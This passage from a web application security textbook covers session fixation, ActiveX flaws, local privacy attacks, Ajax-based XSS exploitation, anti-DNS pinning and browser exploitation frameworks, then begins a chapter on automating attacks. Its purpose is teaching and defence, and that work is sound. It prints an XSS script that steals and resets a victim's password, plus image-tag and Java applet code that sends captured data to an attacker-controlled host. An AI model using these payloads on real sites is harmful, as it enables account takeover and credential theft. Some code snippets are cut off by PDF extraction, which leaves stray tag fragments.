take any steps to ensure that the tokens fixed in target users’ browsers are cur-

rently valid. The attacker can simply choose an arbitrary token, distribute this

as widely as possible (for example, by emailing a URL containing the token to

individual users, mailing lists, etc.), and then periodically poll a protected

page within the application (for example, My Details) to detect when a victim

has used the token to log in. Even if a targeted user does not follow the URL

for several months, a determined attacker may still be able hijack their session.

Finding and Exploiting Session Fixation Vulnerabilities

If the application supports authentication, you should review how it handles

session tokens in relation to the login. There are two ways in which the appli-

cation may be vulnerable:

■■

The application issues an anonymous session token to each unauthenti-

cated user. When the user logs in, no new token is issued — rather, their

existing session is upgraded to an authenticated session. This behavior

is common when the application uses the application server’s default

session-handling mechanism.

452 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 452

Chapter 12 ■ Attacking Other Users 453

■■

The application does not issue tokens to anonymous users, and a token

is issued only following a successful login. However, if a user accesses

the login function using an authenticated token, and logs in using dif-

ferent credentials, no new token is issued — rather, the user associated

with the previously authenticated session is changed to the identity of

the second user.

In both of these cases, an attacker can obtain a valid session token (either by

simply requesting the login page or by performing a login with his own cre-

dentials) and feed this to a target user. When that user logs in using the token,

the attacker can hijack the user’s session.

HACK STEPS

■ Obtain a valid token, by whatever means the application enables you to

obtain one.

■ Access the login form and perform a login using this token.

■ If the login is successful and the application does not issue a new token,

then it is vulnerable to session fixation.

If the application does not support authentication, but does allow users to

submit and then review sensitive information, you should verify whether the

same session token is used before and after the initial submission of user-spe-

cific information. If so, then an attacker can obtain a token and feed this to a

target user. When the user submits sensitive details, the attacker can use the

token to view the user’s information.

HACK STEPS

■ Obtain a session token as a completely anonymous user, and then walk

through the process of submitting sensitive data, up until any page at

which the sensitive data is displayed back.

■ If the same token originally obtained can now be used to retrieve the

sensitive data, then the application is vulnerable to session fixation.

■ If any type of session fixation is identified, verify whether the server

accepts arbitrary tokens it has not previously issued. If so, the vulnerabil-

ity is considerably easier to exploit over an extended period.

Preventing Session Fixation Vulnerabilities

At any point at which a user interacting with the application transitions from

being anonymous to being identified, the application should issue a fresh session

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 453

454 Chapter 12 ■ Attacking Other Users

token. This applies both to a successful login and to cases where an anonymous

user first submits personal or other sensitive information.

As a defense-in-depth measure to further protect against session fixation

attacks, many security-critical applications employ per-page tokens to supple-

ment the main session token. This technique can frustrate most kinds of ses-

sion hijacking attacks — see Chapter 7 for further details.

The application should not accept arbitrary session tokens that it does not

recognize as having issued itself. The token should be immediately canceled

within the browser, and the user should be returned to the start page of the

application.

Attacking ActiveX Controls

We described in Chapter 5 how applications can use various thick-client tech-

nologies to distribute some of the application’s processing to the client side.

ActiveX controls are of particular interest to an attacker who is targeting other

users. When an application installs a control in order to invoke it from its own

pages, the control must be registered as “safe for scripting.” Once this has

occurred, any other web site accessed by the user can make use of that control.

Browsers do not accept just any ActiveX control that a web site requests

them to install. By default, when a web site seeks to install a control, the

browser presents a security warning and asks the user for permission. The

user can decide whether or not they trust the web site issuing the control, and

allow it to be installed accordingly. However, if they do so, and the control con-

tains any vulnerabilities, these can be exploited by any malicious web site vis-

ited by the user.

There are two main categories of vulnerability commonly found within

ActiveX controls that are of interest to an attacker:

■■

Because ActiveX controls are typically written in native languages such

as C/C++, they are at risk from classic software vulnerabilities such as

buffer overflows, integer bugs, and format string flaws (see Chapter 15

for more details). In recent years, a huge number of these vulnerabilities

have been identified within the ActiveX controls issued by popular web

applications, such as online gaming sites. These vulnerabilities can nor-

mally be exploited to cause arbitrary code execution on the computer of

the victim user.

■■

Many ActiveX controls contain methods that are inherently dangerous

and vulnerable to misuse. For example:

■■

LaunchExe(BSTR ExeName)

■■

SaveFile(BSTR FileName, BSTR Url)

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 454

■■

LoadLibrary(BSTR LibraryPath)

■■

ExecuteCommand(BSTR Command)

Methods like these are usually implemented by developers in order to build

some flexibility into their control, enabling them to extend its functionality in

future without needing to deploy a fresh control altogether. However, once the

control is installed, it can of course be “extended” in the same way by any

malicious web site in order to carry out undesirable actions against the user.

Finding ActiveX Vulnerabilities

When an application installs an ActiveX control, in addition to the browser

alert asking your permission to install it, you should see code similar to the fol-

lowing within the HTML source of an application page:

classid=”CLSID:A61BC839-5188-4AE9-76AF-109016FD8901”

codebase=”https://wahh-app.com/bin/myobject.cab”>

</object>

This code tells the browser to instantiate an ActiveX control with the speci-

fied name and

classid, and to download the control from the specified URL.

If a control is already installed, the

codebase parameter is not required, and the

browser will locate the control from the local computer, based on its unique

classid.

If a user gives permission to install the control, then the browser registers it

as “safe for scripting.” This means that it can be instantiated, and its methods

invoked, by any web site in the future. To verify for sure that this has been

done, you can check the registry key

HKEY_CLASSES_ROOT\CLSID\{classid of

control taken from above HTML}\Implemented Categories

. If the subkey

7DD95801-9882-11CF-9FA9-00AA006C42C4 is present, then the control has been

registered as “safe for scripting,” as illustrated in Figure 12-11.

Figure 12-11: A control registered as safe for scripting

Chapter 12 ■ Attacking Other Users 455

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 455

When an ActiveX control has been instantiated by the browser, individual

methods can be invoked as follows:

document.oMyObject.LaunchExe(‘myAppDemo.exe’);

</script>

HACK STEPS

A simple way to probe for ActiveX vulnerabilities is to modify the HTML that

invokes the control, pass your own parameters to it, and monitor the results:

■ Vulnerabilities such as buffer overflows can be probed for using the

same kind of attack payloads as are described in Chapter 15. Triggering

bugs of this kind in an uncontrolled manner is mostly likely to result in a

crash of the browser process that is hosting the control.

■ Inherently dangerous methods such as LaunchExe can often be identi-

fied simply by their name. In other cases, the name may be innocuous or

obfuscated, but it may be clear that interesting items such as file names,

URLs, or system commands are being passed as parameters. You should

try modifying these parameters to arbitrary values and determine

whether the control processes your input as expected.

It is common to find that not all of the methods implemented by a control

are actually invoked anywhere within the application. For example, methods

may have been implemented for testing purposes, may have been superseded

but not removed, or may exist for future use or self-updating purposes. To per-

form a comprehensive test of a control, it is necessary to enumerate all of the

attack surface it exposes through these methods, and test all of them.

Various tools exist for enumerating and testing the methods exposed by

ActiveX controls. One useful tool is COMRaider by iDefense, which can dis-

play all of a control’s methods and perform basic fuzz testing of each, as

shown in Figure 12-12.

Preventing ActiveX Vulnerabilities

Defending compiled software components against attack is a large and complex

area, and goes beyond the scope of this book. Basically, the designers and devel-

opers of an ActiveX control must ensure that the methods that it implements

456 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 456

Figure 12-12: COMRaider showing the methods of an ActiveX control

cannot be invoked by a malicious web site to carry out undesirable actions

against a user who has installed it. For example:

■■

A security-focused source code review and penetration test should be car-

ried out on the control to locate vulnerabilities such as buffer overflows.

■■

The control should not expose any inherently dangerous methods that

call out to the file system or operating system using user-controllable

input. Safer alternatives are usually available with minimal extra effort.

For example, if it is considered necessary to launch external processes,

compile a list of all the external processes that may legitimately and

safely be launched, and either create a separate method to call each one

or use a single method that takes an index number into this list.

As an additional defense-in-depth precaution, some ActiveX controls vali-

date the domain name that issued the HTML page from which they are being

invoked. Some controls go even further than this, and require that all parame-

ters passed to the control must be cryptographically signed. If an unautho-

rized domain attempts to invoke the control, or the signature passed is invalid,

the control does not carry out the requested action. You should be aware that

some defenses of this kind can be circumvented if the web site that is permit-

ted to invoke the control contains any XSS vulnerabilities.

Chapter 12 ■ Attacking Other Users 457

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 457

Local Privacy Attacks

Many users access web applications from a shared environment in which an

attacker may have direct access to the same computer as the user. This gives

rise to a range of attacks to which insecure applications may leave their users

vulnerable. There are several areas in which this kind of attack may arise.

Persistent Cookies

Some applications store sensitive data in a persistent cookie, which most

browsers save on the local file system.

HACK STEPS

■ Review all of the cookies identified during your application mapping

exercises (see Chapter 4). If any Set-cookie instruction contained an

expires attribute with a date that is in the future, this will cause the

browser to persist that cookie until that date. For example:

UID=d475dfc6eccca72d0e expires=Wed, 12-Mar-08 16:08:29 GMT;

■ If a persistent cookie is set that contains any sensitive data, then a local

attacker may be able to capture this data. Even if a persistent cookie con-

tains an encrypted value, if this plays a critical role such as reauthenticat-

ing the user without entering credentials, then an attacker who captures

it will be able to resubmit it to the application without actually decipher-

ing its contents (see Chapter 6).

Cached Web Content

Most browsers cache non-SSL web content unless a web site specifically

instructs them not to. The cached data is normally stored on the local file system.

HACK STEPS

■ For any application pages which are accessed over HTTP and which con-

tain sensitive data, review the details of the server’s response to identify

any cache directives.

458 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 458

Chapter 12 ■ Attacking Other Users 459

HACK STEPS (continued)

■ The following directives will prevent browsers from caching a page. Note

that these may be specified within the HTTP response headers or within

HTML meta-tags:

Expires: 0

Cache-control: no-cache

Pragma: no-cache

■ If these directives are not found, then the page concerned may be vulner-

able to caching by one or more browsers. Note that cache directives are

processed on a per-page basis, and so every sensitive HTTP-based page

needs to be checked.

■ To verify that sensitive information is being cached, use a default instal-

lation of a standard browser, such as Internet Explorer or Firefox. In the

browser’s configuration, completely clean its cache and all cookies, and

then access the application pages that contain sensitive data. Review the

files that have appeared in the cache to see if any of these contain sensi-

tive data. If a large number of files are being generated, you can take a

specific string from a page’s source, and search the cache for that string.

■ The default cache locations for common browsers are:

■

Internet Explorer: Subdirectories of C:\Documents and Settings\

{username}\Local Settings\Temporary Internet Files\

Content.IE5

Note that in Windows Explorer, to view this folder you need to enter this

exact path and have hidden folders showing, or browse to the above

folder from the command line.

■

Firefox (on Windows): C:\Documents and Settings\

{username}\Local Settings\Application Data\Mozilla\

Firefox\Profiles\{profile name}\Cache

■

Firefox (on Linux): ~/.mozilla/firefox/{profile name}/Cache

Browsing History

Most browsers save a browsing history, which may include any sensitive data

transmitted in URL parameters.

HACK STEPS

■ Identify any instances within the application in which sensitive data is

being transmitted via a URL parameter.

■ If any cases exist, examine the browser history to verify that this data has

been stored there.

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 459

Autocomplete

Many browsers implement a user-configurable autocomplete function for

text-based input fields, which may store sensitive data such as credit card

numbers, usernames, and passwords. Autocomplete data is stored within the

registry by Internet Explorer and on the file system by Firefox.

As already described, in addition to being accessible by local attackers, data

in the autocomplete cache can also be retrieved via an XSS attack in certain cir-

cumstances.

HACK STEPS

■ Review the HTML source code for any forms that contain text fields in

which sensitive data is captured.

■ If the attribute autocomplete=off is not set, either within the form tag

or the tag for the individual input field, then data entered will be stored

within browsers where autocomplete is enabled.

Preventing Local Privacy Attacks

Applications should avoid storing anything sensitive in a persistent cookie.

Even if this data is encrypted, it can be resubmitted by an attacker who cap-

tures it.

Applications should use suitable cache directives to prevent sensitive data

from being stored by browsers. In ASP applications, the following instructions

will cause the server to include the required directives:

<% Response.CacheControl = “no-cache” %>

<% Response.AddHeader “Pragma”, “no-cache” %>

<% Response.Expires = 0 %>

In Java applications, the following commands should achieve the same

result:

response.setHeader(“Cache-Control”,”no-cache”);

response.setHeader(“Pragma”,”no-cache”);

response.setDateHeader (“Expires”, 0);

Applications should never use URLs to transmit sensitive data, as these are

liable to be logged in numerous locations. All such data should be transmitted

using HTML forms that are submitted using the

POST method.

460 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 460

In any instance where users enter sensitive data into text input fields, the

autocomplete=off attribute should be specified within the form or field tag.

Advanced Exploitation Techniques

This section does not describe any new categories of vulnerability that arise

within web applications. Rather, it describes some advanced techniques that may

be employed in the course of exploiting the vulnerabilities already examined.

Leveraging Ajax

We described earlier how Ajax techniques can be used to implement sophisti-

cated user interfaces that behave more like local desktop software than older

web applications ever could.

The ability of Ajax to carry out actions behind the scenes in a flexible and

powerful way makes it extremely attractive to someone seeking to attack other

users of an application. If an attacker has the ability to execute arbitrary

JavaScript within the browser of a victim user (for example, via an XSS vul-

nerability), then he can use Ajax techniques to perform arbitrarily complex

actions involving multiple requests to the vulnerable application.

You have already seen

XMLHttpRequest being used to generate a TRACE

request to a web application that employed HttpOnly cookies. The following

example shows a more sophisticated attack in which two requests are made to

perform an action on behalf of a victim user. Suppose that a web application

allows authenticated users to view and update their account details, including

their current password, which is masked on-screen. If the application contains

an XSS flaw anywhere within its functionality, then an attacker can inject the

following script to reset the user’s password:

var request = new ActiveXObject(“Microsoft.XMLHTTP”);

request.open(“GET”, “http://wahh-app.com/ShowAccount.php”, false);

request.send();

var password = request.responseText.substring(

request.responseText.indexOf(“password\“ value=\“”) + 17);

password = password.substring(0, password.indexOf(“\“”));

request = new ActiveXObject(“Microsoft.XMLHTTP”);

request.open(“POST”, “http://wahh-app.com/ChangePasswd.php”, false);

request.send(“oldPassword=” + password +

“&newPassword=0wned&confirmPassword=0wned”);

</script>

Chapter 12 ■ Attacking Other Users 461

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 461

When this script is executed, the victim’s browser will first issue the follow-

ing request:

GET /ShowAccount.php HTTP/1.1

Host: wahh-app.com

which returns a form including the following field:

The script then parses out the value of the password field and causes the vic-

tim’s browser to issue the following request:

POST /ChangePassword.php HTTP/1.1

Host: wahh-app.com

Content-Length: 60

oldPassword=kemppike&newPassword=0wned&confirmPassword=0wned

which results in the user’s password being reset to a value controlled by the

attacker. Each of these requests occurs asynchronously, without any obvious

indication to the user that they have taken place. If skillfully executed, the user

will not know about the attack until the next time they attempt to log in.

NOTE The example script shown works on Internet Explorer. A slightly more

complicated script could be created that worked on all common browsers.

The MySpace worm, which exploited a stored XSS vulnerability, employed

Ajax techniques, and provides a useful example of the kind of complex opera-

tions that can be carried out using this technology. The steps performed by the

worm’s payload included the following:

1. Parse the source code of the current page to extract the ID of the

MySpace user who is viewing it.

2. If the current page was issued by the domain

profile.myspace.com,

switch the location to

www.myspace.com with the same relative URL.

(The

profile.myspace.com domain can only be used to view profiles,

while the

www.myspace.com domain can also be used to add new friends

and perform other tasks. Because

XMLHttpRequest can only be used to

make requests to the same domain that issued it, it is necessary to

switch domain before issuing requests to add friends.)

3. Parse the current page to extract the worm’s own source code, and

URL-encode it.

4. Make a

GET request to the user’s Add Friend page to extract the per-

page token that it contains.

462 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 462

5. Make a POST request (including the per-page token) to the user’s Add

Friend page to add the worm’s author as a friend.

6. Make a

GET request to the user’s Add Hero page to extract the per-page

token that it contains.

7 Make a

POST request (including the per-page token) to the user’s Add

Hero page to add the worm’s author as a hero and also embed the

source code for the worm itself, so that it will propagate when other

people view the user’s profile.

Making Asynchronous Off-Site Requests

The browser’s same origin policy prevents XMLHttpRequest from being used

to make off-site requests, because this would enable a malicious web site to

retrieve and process data from other domains. Hence, in the earlier example,

the attacker could not use

XMLHttpRequest to submit the user’s existing pass-

word out to an external server which he controls. However, this restriction can

be circumvented by supplementing Ajax with other techniques.

There are numerous ways in which an injected script may cause arbitrary

captured data to be submitted to an external server. To generate a single

request, an image tag can be created with an arbitrary source URL. For exam-

ple, having parsed out the victim’s password from the account details page,

the attacker can transmit this to his server using the following JavaScript:

document.write(“<img src=\“http://wahh-attacker.com/“+password+”\“>”);

By creating numerous such tags programmatically, it is possible to generate

asynchronous requests to an external server. Another way for an attacker to do

this is to call out to a Java applet from his injected code. For example, the

attacker can create an applet that implements the following method:

import java.io.*;

import java.net.*;

public String phoneHome(String data)

{

try

{

URLConnection urlConn = new URL(

“http://wahh-attacker.com/phonehome”).openConnection();

urlConn.setDoOutput(true);

urlConn.setRequestProperty (“Content-Type”,

“application/x-www-form-urlencoded”);

DataOutputStream dos = new DataOutputStream(

Chapter 12 ■ Attacking Other Users 463

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 463

urlConn.getOutputStream ());

dos.writeBytes(data);

dos.flush();

dos.close();

DataInputStream input = new DataInputStream(

urlConn.getInputStream ());

}

catch (Exception e)

{

return e.getMessage();

}

return “data sent”;

}

This method accepts an arbitrary String as input, and generates a POST

request to the attacker’s server, containing this data.

The attacker can cause the victim’s browser to load the applet by inserting

the following HTML before his malicious script:

<applet codebase=”http://wahh-attacker.com” code=”PhoneHome.class”

id=”theApplet”></applet>

The applet can then be invoked from the attacker’s script to issue asynchro-

nous requests, as follows:

theApplet.phoneHome(password);

Despite the various security restrictions imposed by the browser’s same ori-

gin policy, this technique is successful because:

■■

HTML documents may load Java applets from any domain.

■■

The applet is loaded from wahh-attacker.com and only ever communi-

cates back to

wahh-attacker.com.

■■

XMLHttpRequest is only ever used to communicate to wahh-app.com,

from where the attacker’s script was loaded.

■■

Any JavaScript on an HTML page may invoke the public methods of

any applet loaded by the page.

Anti-DNS Pinning

Anti-DNS pinning is a technique that can be used to perform a partial breach

of same origin restrictions in some situations, enabling a malicious web site to

interact with a different domain.

464 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 464

A Hypothetical Attack

To understand what DNS pinning is, and why it is necessary, let us first imag-

ine a world in which it does not exist. Suppose that a malicious web site wishes

to retrieve and process data from a different domain. Without DNS pinning,

this attack could be achieved through the following steps:

1. An unwitting user follows a link to the URL

http://wahh-attacker.com/.

2. The user’s browser resolves the domain name

wahh-attacker.com. To

do this, it performs a DNS lookup on the attacker’s name server. The

name server responds with the IP address of the attacker’s web server

(

1.2.3.4), with a time to live (TTL) of one second.

3. The user’s browser issues the following request to IP address

1.2.3.4:

GET / HTTP/1.1

Host: wahh-attacker.com

4. The attacker’s web server returns a page containing a script that waits

for two seconds and then performs two actions. The first action is to use

XMLHttpRequest to retrieve http://wahh-attacker.com/. Because this

is the same domain that invoked the script, the request is permitted.

5. Because the browser has waited for two seconds, its previous DNS

lookup on

wahh-attacker.com has now expired, and so the browser

performs a second lookup. This time, the attacker’s name server

responds with the IP address of

wahh-app.com, which is 5.6.7.8.

6. The user’s browser issues the following request to IP address

5.6.7.8:

GET / HTTP/1.1

Host: wahh-attacker.com

7. The wahh-app.com server responds with its content, which the

attacker’s script is able to process via the

XMLHttpRequest object.

8. The attacker’s script loaded in step 4 performs its second action, which

is to transmit the data retrieved in step 7 to a location controlled by the

attacker. Recall that any web site can issue a request to any other

domain, and in this case, the attacker’s script posts the captured data to

www2.wahh-attacker.com in the standard way.

The hypothetical attack just described succeeds in retrieving data across

domains; however, it only constitutes a partial breach of the browser’s same

origin policy. Crucially, in step 3 the user’s browser believes it is submitting a

request to the domain

wahh-attacker.com, and this is the context in which the

request is made. Any cookies that the user has for the domain

wahh-app.com,

Chapter 12 ■ Attacking Other Users 465

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 465

such as session tokens, are not transmitted. This means that the content

retrieved in the attack will be the same as if the attacker had simply visited

http://wahh-app.com/ directly himself.

So what does the attack achieve? It is effective in retrieving content from

web sites which the user can access but which the attacker cannot. If the user

is on a corporate LAN, the attacker will be able to browse intranet sites on the

LAN. If the user is on a home DSL connection, the attacker will be able to com-

municate with the administrative interface on their router, which listens only

on the internal home network. The attacker can also interact with any web-

based services on the user’s own computer, even if these are protected by a

personal firewall. In these situations, the attacker can reach servers that are

defended by the network topology rather than by authentication and sessions.

A sophisticated attack could turn the user’s browser into an open proxy, allow-

ing the attacker to capture data from, and perform arbitrary actions against,

arbitrary targets. In many contexts, this could be a very serious threat.

DNS Pinning

It is specifically to prevent this kind of attack that DNS pinning exists. When

browsers resolve a domain name to an IP address, they cache the IP address

for the duration of the current browser session, regardless of the TTL value

specified in the response to the lookup. Hence, in step 5 of the hypothetical

attack, the browser will continue to associate

wahh-attacker.com with the

original IP address

1.2.3.4, and so does not make any request to the server at

wahh-app.com. So the attack was only hypothetical after all.

Attacks against DNS Pinning

Or was it?

In August 2006, Martin Johns discovered that DNS pinning can be defeated

by rejecting HTTP connections. In step 5 of the attack, the user’s browser

enforces DNS pinning and so makes the subsequent request to the original IP

address

1.2.3.4, However, if the attacker’s server rejects this connection

attempt (for example, by firewalling its HTTP port), then the user’s browser

drops the DNS pinning and performs a fresh lookup on

wahh-attacker.com.

At this point, the attacker responds with the IP address

5.6.7.8 and the attack

proceeds as originally described. This behavior means that the protection

offered by DNS pinning can be trivially defeated by any serious attacker.

A second defect in the reliance on DNS pinning defenses is that they do not

protect users who access the Internet via a proxy server. In this situation, DNS

resolution is performed by the proxy, not the browser. Hence, browser-based

466 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 466

DNS pinning is irrelevant, and the hypothetical attack originally described is

fully effective. For further details, see the following paper:

http://www.ngssoftware.com/research/papers/

DnsPinningAndWebProxies.pdf

A further twist in the DNS pinning story relates to the HTTP Host header.

Notice that in step 6, the request to the

wahh-app.com web server contains the

domain

wahh-attacker.com in its Host header, because the user’s browser still

believes it is accessing the attacker’s domain. This means that web sites could

seek to defend against anti-DNS pinning by checking the

Host header in all

requests and rejecting those specifying a different domain. However, an

attacker can spoof an arbitrary

Host header in various ways, both via XML-

HttpRequest

itself on older browsers or through older versions of Flash.

Hence, checking the

Host header should not be considered a reliable means of

thwarting anti-DNS pinning attacks. The only failsafe method is to ensure that

sensitive web content is protected by effective authentication and sessions,

regardless of any defenses imposed by the network topology.

Note that because an attacker performing anti-DNS pinning can gain full

two-way interaction with a target web application, he can perform any of the

attacks that are possible against applications on the public Internet. Hence,

organizations hosting applications internally on protected networks should

ensure that they are robustly defended against common web application

attacks, in the same way as if those applications were accessible directly from

the Internet.

Browser Exploitation Frameworks

Various frameworks have been developed to demonstrate and exploit the vari-

ety of possible attacks that may be carried out against end users on the Inter-

net. These typically require a JavaScript hook to be placed into the browser of

a victim, via some vulnerability such as XSS. Once the hook is in place, the

browser contacts a server controlled by the attacker, and may poll this server

periodically, submitting data back to the attacker and providing a control

channel for receiving commands from the attacker.

Actions which may be carried out within this type of framework include the

following:

■■

Logging keystrokes and sending these to the attacker.

■■

Capturing clipboard contents and sending these to the attacker.

■■

Hijacking the user’s session with the vulnerable application.

■■

Fingerprinting the victim’s browser and exploiting known browser vul-

nerabilities accordingly.

Chapter 12 ■ Attacking Other Users 467

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 467

■■

Performing port scans of other hosts (which may be on a private net-

work accessible by the compromised user browser), and sending the

results to the attacker.

■■

Attacking other web applications accessible via the compromised user’s

browser, by forcing the browser to send malicious requests.

■■

Brute forcing the user’s browsing history and sending this to the

attacker.

One example of a sophisticated browser exploitation framework is BeEF,

which was developed by Wade Alcon and implements the preceding func-

tionality. Figure 12-13 shows BeEF capturing information from a compromised

user, including computer details, the URL and page content currently dis-

played, and keystrokes entered by the user.

Figure 12-13: Data captured from a compromised user by BeEF

Figure 12-14 shows BeEF performing a port scan of the victim user’s own

computer.

Figure 12-14: BeEF performing a port scan of a compromised user’s computer

468 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 468

Another highly functional browser exploitation framework is XSS Shell, pro-

duced by SecuriTeam. This provides a wide range of functions for manipulat-

ing zombie hosts compromised via XSS, including capturing of keystrokes,

clipboard contents, mouse movements, screenshots, and URL history, as well as

the injection of arbitrary JavaScript commands. It also remains resident within

the user’s browser if she navigates to other pages within the application.

Chapter Summary

We have examined a huge variety of ways in which defects in a server-side

web application may leave its users exposed to malicious attack. Many of

these vulnerabilities are complex to understand and discover, and often neces-

sitate an amount of investigative effort that exceeds their actual significance as

the basis for a worthwhile attack. Nevertheless, it is common to find that lurk-

ing among a large number of uninteresting client-side flaws is a serious vul-

nerability that can be leveraged to attack the application itself. In many cases,

the effort is worth it.

Further, as awareness of web application security continues to evolve, direct

attacks against the server component itself are likely to become less straight-

forward to discover or to execute. Attacks against other users, for better or

worse, are certainly part of everyone’s future.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is the standard “signature” in an application’s behavior that can

be used to identify most instances of XSS vulnerabilities?

2. You discover a reflected XSS vulnerability within the unauthenticated

area of an application’s functionality. State two different ways in which

the vulnerability could be used to compromise an authenticated session

within the application.

3. You discover that the contents of a cookie parameter are copied without

any filters or sanitization into the application’s response. Can this

behavior be used to inject arbitrary JavaScript into the returned page?

Can it be exploited to perform an XSS attack against another user?

4. You discover stored XSS behavior within data that is only ever displayed

back to yourself. Does this behavior have any security significance?

5. You are attacking a web mail application that handles file attachments

and displays these in-browser. What common vulnerability should you

immediately check for?

Chapter 12 ■ Attacking Other Users 469

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 469

6. How does the browser’s same origin policy impinge upon the use of

the Ajax technology

XMLHttpRequest?

7. Name three possible attack payloads for XSS exploits (that is, the mali-

cious actions that you can perform within another user’s browser, not

the methods by which you deliver the attacks).

8. You discover a function which copies the value of some user-supplied

data into the target of an image tag:

The data is stored within the application and will be returned to other

authenticated users who view the relevant page. The application is

HTML-encoding the

< and > characters, preventing you from breaking

out of the image tag. What two categories of attack can you perform?

9. You have discovered a reflected XSS vulnerability where you can inject

arbitrary data into a single location within the HTML of the returned

page. The data inserted is truncated to 50 bytes, but you want to inject a

lengthy script. You prefer not to call out to a script on an external

server. How can you work around the length limit?

10. You discover a reflected XSS flaw in a request that must use the

POST

method. What delivery mechanisms are feasible for performing an attack?

11. How can an attacker make use of the

TRACE method to facilitate an XSS

attack?

12. You discover an application function where the contents of a query

string parameter are inserted into the

Location header in an HTTP redi-

rect. What three different types of attacks can this behavior potentially

be exploited to perform?

13. Your very first request to a banking application returns HTML like the

following:

</frameset>

What vulnerability can you immediately diagnose here, without per-

forming any further testing?

14. What is the main precondition that must exist to enable an XSRF attack

against a sensitive function of an application?

15. What three defensive measures can each be used to prevent JSON

hijacking attacks?

470 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 470

471

This chapter does not introduce any new categories of vulnerability. Rather,

we will be examining one key element in an effective methodology for hacking

web applications — that is, the use of automation to strengthen and accelerate

bespoke attacks. The range of techniques involved can be applied throughout

the application and to every stage of the attack process, from initial mapping

to actual exploitation.

Every web application is different. Attacking an application effectively

involves using various manual procedures and techniques to understand its

behavior and probe for vulnerabilities. It also entails bringing to bear your

experience and intuition in an imaginative way. Attacks are typically bespoke,

or custom-made, in nature, tailored to the particular behavior you have iden-

tified, and the specific ways in which the application enables you to interact

with and manipulate it. Performing bespoke attacks manually can be

extremely laborious and is prone to mistakes. The most successful web appli-

cation hackers take their bespoke attacks a step further, and find ways of

automating these to make them easier, faster, and more effective.

In this chapter, we will describe a proven methodology for automating

bespoke attacks. This methodology combines the virtues of human intelli-

gence and computerized brute force, usually with devastating results.

Automating Bespoke Attacks

CHAPTER

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 471

Uses for Bespoke Automation

There are three main situations in which bespoke automated techniques can be

employed to assist you in attacking a web application:

■■

Enumerating identifiers — Most applications use various kinds of

names and identifiers to refer to individual items of data and resources,

such as account numbers, usernames, and document IDs. It is fre-

quently the case that you need to iterate through a very large number of

potential identifiers, to enumerate which ones are valid or worthy of

further investigation. In this situation, you can use automation in a

fully bespoke way to work through a list of possible identifiers or cycle

through the syntactic range of identifiers believed to be in use by the

application.

An example of an attack to enumerate identifiers would be where an

application uses a page number parameter to retrieve specific content:

https://wahh-app.com/app/showPage.jsp?PageNo=244197

In the course of browsing through the application, you discover a large

number of valid

PageNo values, but to identify every valid value you

need to cycle through the entire range — something you cannot feasibly

do manually.

■■

Harvesting data — There are many kinds of web application vulnera-

bilities that enable you to extract useful or sensitive data from the appli-

cation using specific crafted requests. For example, a personal profile

page may display the personal and banking details of the current user

and indicate that user’s privilege level within the application. Through

an access control defect, you may be able to view the personal profile

page of any application user — but only one user at a time. To harvest

this data for every user might require thousands of individual requests.

Rather than working manually, you can use a bespoke automated

attack to quickly capture all of this data in a useful form.

An example of harvesting useful data would be to extend the enumera-

tion attack described previously. Instead of simply confirming which

PageNo values are valid, your automated attack could extract the con-

tents of the HTML title tag from each page it retrieves, enabling you to

quickly scan the list of pages for those that are most interesting.

■■

Web application fuzzing — In describing the practical steps for detect-

ing common web application vulnerabilities, we have seen numerous

examples where the best approach to detection is to submit various

unexpected items of data and attack strings, and review the applica-

472 Chapter 13 ■ Automating Bespoke Attacks

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 472

tion’s responses for any anomalies that indicate that the flaw may be

present. In a large application, your initial mapping exercises may iden-

tify dozens of distinct requests which you need to probe, each contain-

ing numerous different parameters. To test each case manually is

time-consuming and mind-numbing, and liable to leave a large part of

the attack surface neglected. Using bespoke automation, however, you

can very quickly generate huge numbers of requests containing com-

mon attack strings, and quickly assess the server’s responses to home in

on interesting cases that merit further investigation. This technique is

often referred to as fuzzing.

We will examine in detail each of these three situations, and the ways in

which bespoke automated techniques can be leveraged to vastly enhance your

attacks against an application.

Enumerating Valid Identifiers

In the course of describing various common vulnerabilities and attack tech-

niques, we have encountered numerous situations in which the application

employs a name or identifier for some item, and your task as an attacker is to

discover some or all of the valid identifiers in use. Some examples of where

this requirement can arise are:

■■

The application’s login function returns informative messages that dis-

close whether a failed login was the result of an unrecognized user-

name or incorrect password. By iterating through a list of common

usernames and attempting to log in using each one, you can narrow the

list down to those that you know to be valid. This list can then be used

as the basis for a password guessing attack.

■■

Many applications use identifiers to refer to individual resources that

are processed within the application, such as document IDs, account

numbers, employee numbers, and log entries. Often, the application

will expose some means of confirming whether a specific identifier is

valid. By iterating through the syntactic range of identifiers in use, you

can obtain a comprehensive list of all these resources.

■■

If the session tokens generated by the application can be predicted, you

may be able to hijack other users’ sessions simply by extrapolating from

a series of tokens issued to you. Depending on the reliability of this

process, you may need to test a large number of candidate tokens for

each valid value that is confirmed.

Chapter 13 ■ Automating Bespoke Attacks 473

70779c13.qxd:WileyRed 9/14/07 3:14 PM Page 473

The Basic Approach

Your first task in formulating a bespoke automated attack to enumerate valid

identifiers is to locate a request/response pair which has the following charac-

teristics:

■■

